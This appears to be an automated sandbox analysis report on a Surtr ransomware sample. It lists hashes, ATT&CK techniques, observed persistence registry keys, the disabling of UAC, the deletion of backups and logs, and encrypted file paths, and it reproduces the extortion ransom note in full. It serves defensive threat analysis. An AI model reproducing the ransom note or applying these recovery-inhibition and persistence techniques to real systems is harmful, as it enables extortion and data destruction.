surtr | 6b1a255ffd81c4215a32258588140e0ad742605071ae14708ad3b83271d04f85

Analysis

max time kernel
247s
max time network
249s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
14-11-2022 13:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
Size

1.1MB
MD5

ffc6b559c24b8d82afcb5c01bb5619d9
SHA1

8e068e9c486769716d9685f85687b531ab3a88cf
SHA256

b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0
SHA512

48cf29ecbf184f9d96b9db95190657604c7fb9570046abbeba70d99c6748afbea5f698bb4bb91b1b9b3b3ab7abc56c36a3230aa20c58a99269fe0a4884522191
SSDEEP

24576:NyBzKGHF0bxTCFvXwKk/aISpu4Qc6F3v1HT2BzN2tgGS3YzYho1yWEsWbj28Q5m:AV4xTCzu4Qc6/F8S8bzQ

Score

10^/10

surtr evasion persistence ransomware trojan

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.hta

Family

surtr

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ... Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (d75kolyhzzoec2) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

[email protected]

Signatures

Deletes NTFS Change Journal 2 TTPs 1 IoCs

The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

ransomware

Inhibit System Recovery

T1490

Data Destruction

T1485

pid	Process
4724	fsutil.exe

Detects Surtr Payload 4 IoCs

resource	yara_rule
behavioral1/files/0x000700000001abd9-321.dat	family_surtr
behavioral1/files/0x000700000001abda-629.dat	family_surtr
behavioral1/files/0x000600000001abe3-642.dat	family_surtr
behavioral1/files/0x000600000001abe6-655.dat	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Clears Windows event logs 1 TTPs 4 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
4720	wevtutil.exe
1132	wevtutil.exe
4600	wevtutil.exe
1508	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
3588	bcdedit.exe
4060	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4712	wbadmin.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	attrib.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe

Drops desktop.ini file(s) 29 IoCs

description	ioc	Process
File opened for modification	C:\Users\Public\Downloads\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Public\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Stationery\Desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Desktop.ini	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Y:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\M:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\X:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\V:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\Z:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\B:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\N:	reg.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\U:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\G:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\I:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\L:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\Q:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\T:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\F:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\E:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\P:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\R:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\A:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\O:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\K:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\H:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\N:	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg"	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview2x.png	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hu-hu\ui-strings.js	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-100.png	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main.css.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\lv-LV\SURTR_README.txt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\SkypeForBusinessBasic2019_eula.txt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\SURTR_README.txt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\SURTR_README.txt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\SURTR_README.hta	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Configuration\card_expiration_terms_dict.txt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\ui-strings.js.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\es-es\ui-strings.js.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul-oob.xrm-ms.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Trial-ppd.xrm-ms.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\en_get.svg	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files (x86)\Common Files\System\es-ES\SURTR_README.hta	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\offsyml.ttf.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Windows Mail\SURTR_README.hta	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\MatchExactly.ps1.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ExcelFloatieXLEditTextModel.bin.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\IGX.DLL.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mn\SURTR_README.hta	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Trial-pl.xrm-ms.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GARAIT.TTF	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\SURTR_README.hta	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.jpg	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ppd.xrm-ms.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon.png	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\ui-strings.js	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\AppStore_icon.svg.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\SURTR_README.hta	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PrivateData_d75kolyhzzoec2.surt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\SURTR_README.txt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\ui-strings.js.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\ui-strings.js	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial2-ppd.xrm-ms.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OPTINPS.DLL.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\en-gb\PrivateData_d75kolyhzzoec2.surt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\ui-strings.js.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\THMBNAIL.PNG	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\MSVCR110.DLL	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\PrivateData_d75kolyhzzoec2.surt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\de-de\SURTR_README.txt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files\Java\jdk1.8.0_66\db\lib\PrivateData_d75kolyhzzoec2.surt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_pt_BR.properties	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Microsoft Office 15\ClientX64\	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\SURTR_README.hta	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\ui-strings.js	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\PrivateData_d75kolyhzzoec2.surt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\SURTR_README.txt	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\ui-strings.js	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.[[email protected]].[d75kolyhzzoec2].Surtr	b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0.exe
